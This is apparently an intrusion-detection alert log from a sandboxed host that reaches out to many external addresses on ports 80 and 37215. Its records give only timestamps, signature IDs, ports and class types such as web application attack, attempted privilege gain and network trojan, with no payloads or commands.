              Timestamp:192.168.2.23121.128.130.643932802025883 01/02/24-06:24:56.157594
              SID:2025883
              Source Port:43932
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.233.79.10139524802030092 01/02/24-06:24:40.913375
              SID:2030092
              Source Port:39524
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2399.80.176.12533828802025883 01/02/24-06:25:00.994557
              SID:2025883
              Source Port:33828
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.21.5.8858690802025883 01/02/24-06:24:30.711855
              SID:2025883
              Source Port:58690
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2351.178.25.2639996802030092 01/02/24-06:25:19.073342
              SID:2030092
              Source Port:39996
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2335.187.108.16953570802025883 01/02/24-06:25:21.019391
              SID:2025883
              Source Port:53570
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23176.112.147.6145918802030092 01/02/24-06:24:56.122079
              SID:2030092
              Source Port:45918
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2335.183.50.13935316802030092 01/02/24-06:25:42.350384
              SID:2030092
              Source Port:35316
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23211.149.152.3757174802025883 01/02/24-06:25:42.230065
              SID:2025883
              Source Port:57174
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.97.11.2460650802030092 01/02/24-06:25:22.089353
              SID:2030092
              Source Port:60650
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2337.1.204.6437102802030092 01/02/24-06:25:29.908844
              SID:2030092
              Source Port:37102
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.247.18.9351712372152829579 01/02/24-06:23:49.692291
              SID:2829579
              Source Port:51712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2323.194.37.21755520802030092 01/02/24-06:23:55.440502
              SID:2030092
              Source Port:55520
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.71.83.3248722802025883 01/02/24-06:25:16.196517
              SID:2025883
              Source Port:48722
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2335.183.139.12937922802030092 01/02/24-06:25:29.610631
              SID:2030092
              Source Port:37922
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.133.47.14241080802030092 01/02/24-06:25:11.803956
              SID:2030092
              Source Port:41080
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2374.48.170.2654894802030092 01/02/24-06:24:48.887995
              SID:2030092
              Source Port:54894
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23213.92.76.14950818802025883 01/02/24-06:25:32.164890
              SID:2025883
              Source Port:50818
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.243.32.10952362802025883 01/02/24-06:25:05.266557
              SID:2025883
              Source Port:52362
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23185.179.157.10256368802025883 01/02/24-06:24:10.926344
              SID:2025883
              Source Port:56368
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2346.175.16.20649032802030092 01/02/24-06:24:48.996752
              SID:2030092
              Source Port:49032
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2377.46.139.24443154802030092 01/02/24-06:25:02.038352
              SID:2030092
              Source Port:43154
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2385.50.165.3759160802030092 01/02/24-06:24:24.106651
              SID:2030092
              Source Port:59160
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.78.13.16036348802030092 01/02/24-06:23:58.964776
              SID:2030092
              Source Port:36348
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23146.75.21.14359376802025883 01/02/24-06:24:45.316760
              SID:2025883
              Source Port:59376
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2318.65.143.9547196802025883 01/02/24-06:25:12.172054
              SID:2025883
              Source Port:47196
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23203.170.84.9841608802025883 01/02/24-06:24:05.853329
              SID:2025883
              Source Port:41608
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23114.55.243.17648672802025883 01/02/24-06:25:22.179481
              SID:2025883
              Source Port:48672
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2387.255.233.5348182802030092 01/02/24-06:24:08.655481
              SID:2030092
              Source Port:48182
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2346.101.108.16542208802030092 01/02/24-06:24:24.183226
              SID:2030092
              Source Port:42208
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2386.181.28.25240796802025883 01/02/24-06:24:28.186813
              SID:2025883
              Source Port:40796
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23101.42.123.6038286802025883 01/02/24-06:23:49.854020
              SID:2025883
              Source Port:38286
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23173.224.201.17554220802030092 01/02/24-06:24:23.810709
              SID:2030092
              Source Port:54220
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.19.229.17639714802030092 01/02/24-06:24:40.719393
              SID:2030092
              Source Port:39714
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23174.84.210.335298802030092 01/02/24-06:25:31.914564
              SID:2030092
              Source Port:35298
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23154.92.226.19933136802025883 01/02/24-06:24:13.806614
              SID:2025883
              Source Port:33136
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2338.181.35.21934152802030092 01/02/24-06:23:55.217292
              SID:2030092
              Source Port:34152
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.93.2.11952484802025883 01/02/24-06:24:52.173461
              SID:2025883
              Source Port:52484
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.107.28.1660550802025883 01/02/24-06:23:51.391248
              SID:2025883
              Source Port:60550
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.56.102.14636664802025883 01/02/24-06:24:56.015984
              SID:2025883
              Source Port:36664
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.126.113.7654070802030092 01/02/24-06:25:15.540979
              SID:2030092
              Source Port:54070
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23185.110.26.8256372802030092 01/02/24-06:24:19.276074
              SID:2030092
              Source Port:56372
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23154.221.82.22160596802030092 01/02/24-06:25:02.335948
              SID:2030092
              Source Port:60596
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2313.249.87.5444040802030092 01/02/24-06:24:23.621355
              SID:2030092
              Source Port:44040
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.66.27.18250544802025883 01/02/24-06:24:59.193137
              SID:2025883
              Source Port:50544
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23149.155.143.6259544802030092 01/02/24-06:25:25.272485
              SID:2030092
              Source Port:59544
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.43.229.22859784802025883 01/02/24-06:23:58.287305
              SID:2025883
              Source Port:59784
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2331.30.58.13333052802030092 01/02/24-06:24:10.909503
              SID:2030092
              Source Port:33052
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2351.68.46.2342144802030092 01/02/24-06:24:54.912247
              SID:2030092
              Source Port:42144
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23212.8.247.7039420802030092 01/02/24-06:24:59.257113
              SID:2030092
              Source Port:39420
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23154.208.198.21441798802030092 01/02/24-06:24:45.035888
              SID:2030092
              Source Port:41798
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2337.221.198.8650826802030092 01/02/24-06:25:24.777893
              SID:2030092
              Source Port:50826
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23173.242.127.8135322802025883 01/02/24-06:25:25.176699
              SID:2025883
              Source Port:35322
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2350.19.25.18857882802030092 01/02/24-06:24:17.916928
              SID:2030092
              Source Port:57882
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2377.242.107.19653440802025883 01/02/24-06:25:25.327513
              SID:2025883
              Source Port:53440
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23152.67.216.18058250802025883 01/02/24-06:24:09.004126
              SID:2025883
              Source Port:58250
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23103.50.160.13953436802025883 01/02/24-06:24:30.812927
              SID:2025883
              Source Port:53436
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.50.137.22941178802025883 01/02/24-06:24:03.282074
              SID:2025883
              Source Port:41178
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.232.16.231.22546374802025883 01/02/24-06:24:45.225996
              SID:2025883
              Source Port:46374
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23146.75.63.13352912802025883 01/02/24-06:23:55.171237
              SID:2025883
              Source Port:52912
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.196.15.13145438802025883 01/02/24-06:25:02.277841
              SID:2025883
              Source Port:45438
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23157.52.181.6140930802025883 01/02/24-06:25:29.722171
              SID:2025883
              Source Port:40930
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.105.18.18246624802030092 01/02/24-06:24:13.802828
              SID:2030092
              Source Port:46624
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23204.152.46.6744196802025883 01/02/24-06:24:40.815829
              SID:2025883
              Source Port:44196
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23184.85.129.25155542802025883 01/02/24-06:24:01.334668
              SID:2025883
              Source Port:55542
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23121.11.37.23456708802025883 01/02/24-06:24:50.567237
              SID:2025883
              Source Port:56708
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23125.229.151.23948022802025883 01/02/24-06:23:54.655329
              SID:2025883
              Source Port:48022
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23107.158.48.17360248802025883 01/02/24-06:25:24.657251
              SID:2025883
              Source Port:60248
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2335.244.131.839990802025883 01/02/24-06:25:34.794177
              SID:2025883
              Source Port:39990
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23191.82.53.4348036802030092 01/02/24-06:24:27.438039
              SID:2030092
              Source Port:48036
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2354.211.17.19052204802025883 01/02/24-06:23:51.955510
              SID:2025883
              Source Port:52204
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2318.67.147.1742596802030092 01/02/24-06:25:34.896348
              SID:2030092
              Source Port:42596
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23190.167.115.16244810802030092 01/02/24-06:23:55.091590
              SID:2030092
              Source Port:44810
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.254.100.15556258372152835222 01/02/24-06:24:45.346010
              SID:2835222
              Source Port:56258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2318.208.8.11543682802030092 01/02/24-06:25:15.875600
              SID:2030092
              Source Port:43682
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23154.219.183.10247752802025883 01/02/24-06:25:34.822358
              SID:2025883
              Source Port:47752
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23111.87.115.15347612802030092 01/02/24-06:25:25.281636
              SID:2030092
              Source Port:47612
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23220.134.218.24855228802030092 01/02/24-06:23:51.508732
              SID:2030092
              Source Port:55228
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23114.33.8.1834070802025883 01/02/24-06:25:18.822764
              SID:2025883
              Source Port:34070
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2398.123.179.9836228802025883 01/02/24-06:24:08.556843
              SID:2025883
              Source Port:36228
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2394.250.243.644720802030092 01/02/24-06:24:27.687612
              SID:2030092
              Source Port:44720
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.204.79.20242440802030092 01/02/24-06:25:11.888955
              SID:2030092
              Source Port:42440
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23211.253.8.10738410802025883 01/02/24-06:25:02.050528
              SID:2025883
              Source Port:38410
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.50.91.16934304802030092 01/02/24-06:25:25.361156
              SID:2030092
              Source Port:34304
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23159.69.20.6060990802030092 01/02/24-06:23:51.599206
              SID:2030092
              Source Port:60990
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.221.123.6153238802025883 01/02/24-06:25:30.014297
              SID:2025883
              Source Port:53238
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2338.173.201.9140430802025883 01/02/24-06:24:30.753564
              SID:2025883
              Source Port:40430
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2343.192.122.6537710802025883 01/02/24-06:25:42.873893
              SID:2025883
              Source Port:37710
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.63.78.7035444802030092 01/02/24-06:24:24.766885
              SID:2030092
              Source Port:35444
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23185.214.242.16237540802025883 01/02/24-06:24:49.039118
              SID:2025883
              Source Port:37540
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23198.154.232.24259276802030092 01/02/24-06:24:45.021090
              SID:2030092
              Source Port:59276
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2334.203.180.1341426802025883 01/02/24-06:24:04.156700
              SID:2025883
              Source Port:41426
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.14.39.9148702802030092 01/02/24-06:25:37.988872
              SID:2030092
              Source Port:48702
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2371.80.219.1554798802025883 01/02/24-06:24:23.996859
              SID:2025883
              Source Port:54798
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23121.11.37.23456696802030092 01/02/24-06:24:50.251380
              SID:2030092
              Source Port:56696
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2335.231.230.6033018802030092 01/02/24-06:25:03.820714
              SID:2030092
              Source Port:33018
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23173.255.250.6148452802030092 01/02/24-06:24:17.602391
              SID:2030092
              Source Port:48452
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23203.198.100.11341360802030092 01/02/24-06:25:25.334124
              SID:2030092
              Source Port:41360
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2382.163.53.1537476802030092 01/02/24-06:24:23.976596
              SID:2030092
              Source Port:37476
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23198.12.222.11345034802025883 01/02/24-06:24:58.944478
              SID:2025883
              Source Port:45034
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2394.253.89.2442508802030092 01/02/24-06:23:50.267161
              SID:2030092
              Source Port:42508
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23188.128.206.16847120802030092 01/02/24-06:24:13.779989
              SID:2030092
              Source Port:47120
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23209.240.113.20338972802030092 01/02/24-06:25:25.193436
              SID:2030092
              Source Port:38972
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.113.198.15836010802030092 01/02/24-06:24:24.210333
              SID:2030092
              Source Port:36010
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2370.121.13.460866802025883 01/02/24-06:24:27.470721
              SID:2025883
              Source Port:60866
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.235.99.3048078372152829579 01/02/24-06:25:03.497384
              SID:2829579
              Source Port:48078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23186.132.17.22347340802030092 01/02/24-06:24:18.726816
              SID:2030092
              Source Port:47340
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23202.81.229.16957854802025883 01/02/24-06:24:05.844790
              SID:2025883
              Source Port:57854
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2363.195.193.24042464802030092 01/02/24-06:23:51.372398
              SID:2030092
              Source Port:42464
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.55.68.9857508802030092 01/02/24-06:25:29.993837
              SID:2030092
              Source Port:57508
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2334.206.169.21634808802025883 01/02/24-06:25:00.915047
              SID:2025883
              Source Port:34808
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.232.21.224.12652276802030092 01/02/24-06:25:16.010358
              SID:2030092
              Source Port:52276
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2396.67.179.140870802030092 01/02/24-06:24:10.828261
              SID:2030092
              Source Port:40870
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.125.2.9460962802025883 01/02/24-06:24:40.594854
              SID:2025883
              Source Port:60962
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.160.79.11940184802025883 01/02/24-06:25:43.999253
              SID:2025883
              Source Port:40184
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2313.127.14.18542886802030092 01/02/24-06:24:41.189472
              SID:2030092
              Source Port:42886
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23198.44.232.13837024802025883 01/02/24-06:25:43.163000
              SID:2025883
              Source Port:37024
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2367.212.162.8360502802030092 01/02/24-06:23:51.361230
              SID:2030092
              Source Port:60502
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.207.79.24432972802030092 01/02/24-06:24:45.082176
              SID:2030092
              Source Port:32972
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23185.164.6.4838734802030092 01/02/24-06:23:54.914292
              SID:2030092
              Source Port:38734
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2338.132.215.4440936802030092 01/02/24-06:24:13.920460
              SID:2030092
              Source Port:40936
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.92.147.4650912802025883 01/02/24-06:24:41.035412
              SID:2025883
              Source Port:50912
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2338.239.158.19649628802030092 01/02/24-06:24:03.470698
              SID:2030092
              Source Port:49628
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2364.120.69.4946098802030092 01/02/24-06:24:49.087899
              SID:2030092
              Source Port:46098
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2389.31.76.4547048802030092 01/02/24-06:24:08.904729
              SID:2030092
              Source Port:47048
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.68.208.13645118802025883 01/02/24-06:25:29.707548
              SID:2025883
              Source Port:45118
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23208.109.173.19843616802030092 01/02/24-06:25:34.668261
              SID:2030092
              Source Port:43616
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23199.232.239.4846658802025883 01/02/24-06:24:23.868552
              SID:2025883
              Source Port:46658
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23202.238.204.21040470802030092 01/02/24-06:24:24.201458
              SID:2030092
              Source Port:40470
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.69.218.3453078802030092 01/02/24-06:24:30.590605
              SID:2030092
              Source Port:53078
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2344.237.111.25343424802025883 01/02/24-06:23:59.006301
              SID:2025883
              Source Port:43424
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23121.143.178.8245270802030092 01/02/24-06:25:22.173559
              SID:2030092
              Source Port:45270
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23172.98.133.4651318802030092 01/02/24-06:25:21.231178
              SID:2030092
              Source Port:51318
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2354.199.121.17058798802025883 01/02/24-06:24:19.269485
              SID:2025883
              Source Port:58798
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23117.20.101.12541464802025883 01/02/24-06:24:32.881657
              SID:2025883
              Source Port:41464
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23205.164.12.22246902802025883 01/02/24-06:24:20.042564
              SID:2025883
              Source Port:46902
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2343.139.38.17550990802025883 01/02/24-06:24:04.154188
              SID:2025883
              Source Port:50990
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.218.234.14751138802025883 01/02/24-06:25:02.194486
              SID:2025883
              Source Port:51138
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2383.148.198.4442066802025883 01/02/24-06:25:42.757624
              SID:2025883
              Source Port:42066
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23157.245.212.16341682802025883 01/02/24-06:24:14.930071
              SID:2025883
              Source Port:41682
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.120.145.3256908802030092 01/02/24-06:25:06.732120
              SID:2030092
              Source Port:56908
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.204.125.10656446802030092 01/02/24-06:24:14.743069
              SID:2030092
              Source Port:56446
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23193.182.144.15439910802025883 01/02/24-06:25:31.359030
              SID:2025883
              Source Port:39910
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23184.26.2.23933266802030092 01/02/24-06:25:32.158283
              SID:2030092
              Source Port:33266
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.155.199.10545054802030092 01/02/24-06:23:54.818570
              SID:2030092
              Source Port:45054
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23209.240.113.20338972802025883 01/02/24-06:25:25.193436
              SID:2025883
              Source Port:38972
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23184.85.178.23639722802025883 01/02/24-06:25:16.029669
              SID:2025883
              Source Port:39722
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2354.254.143.7760350802025883 01/02/24-06:23:58.484471
              SID:2025883
              Source Port:60350
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.126.126.8152802802030092 01/02/24-06:25:30.150804
              SID:2030092
              Source Port:52802
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.113.198.15836010802025883 01/02/24-06:24:24.210333
              SID:2025883
              Source Port:36010
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23188.166.210.13957904802025883 01/02/24-06:25:21.187951
              SID:2025883
              Source Port:57904
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23178.159.46.9149008802025883 01/02/24-06:25:39.173695
              SID:2025883
              Source Port:49008
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23183.111.183.23054570802030092 01/02/24-06:25:04.271400
              SID:2030092
              Source Port:54570
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2387.106.240.16348362802030092 01/02/24-06:25:18.777402
              SID:2030092
              Source Port:48362
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.232.19.103.22048104802030092 01/02/24-06:25:04.208897
              SID:2030092
              Source Port:48104
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.154.143.21732888802025883 01/02/24-06:25:38.870167
              SID:2025883
              Source Port:32888
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.99.215.10858622802025883 01/02/24-06:24:54.969765
              SID:2025883
